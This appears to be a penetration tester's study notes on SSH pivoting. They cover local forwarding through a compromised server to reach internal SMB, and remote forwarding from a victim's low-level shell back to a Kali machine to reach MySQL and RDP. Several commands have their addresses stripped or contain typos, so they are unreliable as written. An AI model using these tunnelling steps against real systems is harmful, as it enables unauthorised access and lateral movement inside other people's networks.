Port Forwarding

Port forward it to the 52846.

ssh jimmy@ -L 4545:localhost:52846

Now visit (NEW) SO COOL!!!

Local Port Forwarding with ssh

Scenario: you've compromised a server that has ssh service enabled and saw it connected to another network which has certain services running such as SMB. We can create an ssh tunnel to send all the SMB traffic to our machine and then to the another network.

ssh -N -L [username@compromised_machine_IP]

By doing this, we can execute smb related commands to the localhost: which redirects to the target IP (remote machine that we don't have access to)!

make sure to edit /etc/samba/smb.conf if the server is new (2016) as it doesn't support SMB2.

sudo nano /etc/samba/smb.conf
cat /etc/samba/smb.conf
min protocol = SMB2
sudo /etc/init.d/smbd restart

Validate that our smb server is listening:

 ss -antp | grep "445"

Running smbclient through the SSH tunnel:

smbclient -L -U Administrator 

SSH remote forwarding

  • Scenario --- you compromised the machine (low-level shell) but an inbound ssh connection is filtered from outside (Kali can't access the target machine via ssh) and there's another service running as root like MySQL (3306)

  • If the outbound connection with ssh is not filtered by firewall, we can create a remote port forwarding tunnel via ssh to kali and we will be able to access mysql through kali.

From victim's low level shell, run the following

ssh -N -R kali_IP:2221: kali@kali_IP

-N - no ssh command

  • -R remote port forwarding

  • so we are creating a tunnel to kali on port 2221 which will allow inbound connection to 3306

validate you're listening on 2221:

ss -antp | grep "2221" 

Then we can enum the -p 2221 on localhost, essentially enumerating the 3306 on that remote host!

nmap -sS =sV -p 2221

By using this technique, we can get a RDP connection if 3390 is open on the target machine!

#on the target
ssh kali@kali_ip -N -R kali_IP:3390:
#after the remote tunnel is open, run the following on kali

Last updated